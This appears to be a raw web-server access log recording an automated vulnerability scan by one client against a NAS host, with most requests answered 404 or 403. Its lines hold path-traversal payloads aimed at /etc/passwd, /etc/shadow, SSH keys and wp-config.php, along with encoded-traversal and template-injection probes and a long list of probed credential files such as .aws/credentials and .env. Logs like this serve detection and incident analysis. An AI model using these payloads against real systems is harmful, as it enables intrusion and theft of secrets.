"/render?data={{config}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/cfdocs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/admin/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap/cache/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/geth/data/chaindata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/salary/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/threatsim/scenario.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/config/ens.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/android" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/ios" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/liveness" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/windows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/terraform/terraform.tfvars.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/opt/zimbra/conf/localconfig.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/plugin/permissions.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/chromatograph/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase-commerce.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/session/merge" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/banking/oauth_redirects.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/logs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/admin/people" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/blockchain/nodes.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/truffle-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/dns/dkim.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/api/test" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/chrome-extension/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/events/payment_failed.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/robotics/parameters.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/windows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/env.save" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/shopify/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:18 +0000] - 404 404 - GET https nas.profibot.hu "/prometheus.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/statsd/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/dashboard/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/xadmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "///////etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/launchdarkly/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/vault" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/bolt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/audit/logs/payment_chain.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/smtp/azure/sendmail.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/graphql?query={__schema{types{name}}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/notifications/ws" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/:9060" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/webpack.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/download?doc=secret.pdf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 403 403 - GET https nas.profibot.hu "/.env.smtp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/blitz.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 404 404 - GET https nas.profibot.hu "/Thumbs.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:19 +0000] - 403 403 - GET https nas.profibot.hu "/.secrets.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/ros/package.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/sift/api.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/billing/invoice_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/live/logs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/var/www/postfixadmin/config.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/src/environments/environment.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/config.php.copy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/zoho/billing.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/app/bootstrap.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/cache_old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 403 403 - GET https nas.profibot.hu "/.npmrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/marketplace/seller_settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/etc/dovecot/conf.d/10-mail.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/site.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/stripe-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/config/braintree.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/web3/env.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 403 403 - GET https nas.profibot.hu "/~/.pinerc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/payments/multi_currency_rules.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/template?code={%%20raw%20%}{{%20self%20}}{%%20endraw%20%}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:20 +0000] - 404 404 - GET https nas.profibot.hu "/pgsql.dump" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/games/inapp_items.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/~admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 403 403 - GET https nas.profibot.hu "/.aws/credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/pos/payment_methods_matrix.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/selenium/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/authorize?scope=openid+offline_access" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/push/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/admin/logs?file=log.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/unreal/Config/DefaultInput.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/mail/certs/cert.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/akamai/sureroute-test-object.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/config/config.go" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/newsletter/settings.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/src/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/licenses/keys.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/wp-config-sample.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/src/assets/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/events/socket" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/proc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/compute/nodes.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:21 +0000] - 404 404 - GET https nas.profibot.hu "/var/qmail/control/me" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 403 403 - GET https nas.profibot.hu "/.git/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/config/model.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/server.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/plc/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/pub/media/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/edge-addon/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/temp/public/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afproc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/public/manifest.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/binance.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/setup.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/iap/validation_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/db.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/www.tar" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/docs/openapi/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/teamviewer/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/etc/apache2/sites-enabled/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:22 +0000] - 404 404 - GET https nas.profibot.hu "/windows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/site-backup.tar.gz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 403 403 - GET https nas.profibot.hu "/.iex.exs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/engine/options.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/risk/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/live/stats" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/build/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/embedded/ml_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/vault/secrets/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/bandit.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET https nas.profibot.hu "/openbanking/providers.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:23 +0000] - 404 404 - GET 